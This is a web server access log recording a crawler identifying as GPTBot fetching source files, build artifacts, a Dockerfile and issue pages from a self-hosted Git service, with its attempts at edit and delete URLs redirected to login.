"/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/struct.pyc" -[17/Feb/2026:17:02:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11049] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:02:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14314] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:02:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11663] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:02:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11688] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:02:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11689] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:02:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11690] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:02:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11691] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:02:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11654] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest" -[17/Feb/2026:17:02:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 12669] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" -[17/Feb/2026:17:02:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate?display=source" [Client 74.7.227.38] [Length 13013] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:17:02:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python?display=source" [Client 74.7.227.38] [Length 11078] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:17:02:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:17:02:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv?display=source" [Client 74.7.227.38] [Length 11557] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:17:02:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js?display=source" [Client 74.7.227.38] [Length 27387] [Gzip 7.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:17:02:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets?display=source" [Client 74.7.227.38] [Length 11557] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:17:02:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer?display=source" [Client 74.7.227.38] [Length 11569] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:17:02:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:17:02:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer?display=source" [Client 74.7.227.38] [Length 11574] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:17:02:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/uvicorn?display=source" [Client 74.7.227.38] [Length 11545] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:17:02:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/Dockerfile" -[17/Feb/2026:17:02:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/Dockerfile" -[17/Feb/2026:17:02:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/Dockerfile" -[17/Feb/2026:17:02:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/Dockerfile" -[17/Feb/2026:17:02:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 9823] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/Dockerfile" -[17/Feb/2026:17:02:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 12130] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/Dockerfile" -[17/Feb/2026:17:02:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 859] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/Dockerfile" -[17/Feb/2026:17:02:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 943] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/Dockerfile" -[17/Feb/2026:17:02:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx?display=rendered" [Client 74.7.227.38] [Length 10976] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx" -[17/Feb/2026:17:02:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles?display=source" [Client 74.7.227.38] [Length 11562] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:17:02:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles?display=source" [Client 74.7.227.38] [Length 11559] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:17:02:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json" -[17/Feb/2026:17:02:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11606] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:17:02:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11604] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:17:02:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11606] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:17:02:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10145] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:17:02:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/Dockerfile" -[17/Feb/2026:17:02:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/Dockerfile" -[17/Feb/2026:17:02:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/Dockerfile" -[17/Feb/2026:17:02:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/Dockerfile" -[17/Feb/2026:17:02:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 9964] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:17:02:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 9961] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:17:02:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:17:02:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11119] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:02:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14657] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:02:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:17:02:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:17:02:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:17:02:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10818] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:17:02:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10819] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:17:02:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10820] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:17:02:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:17:02:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 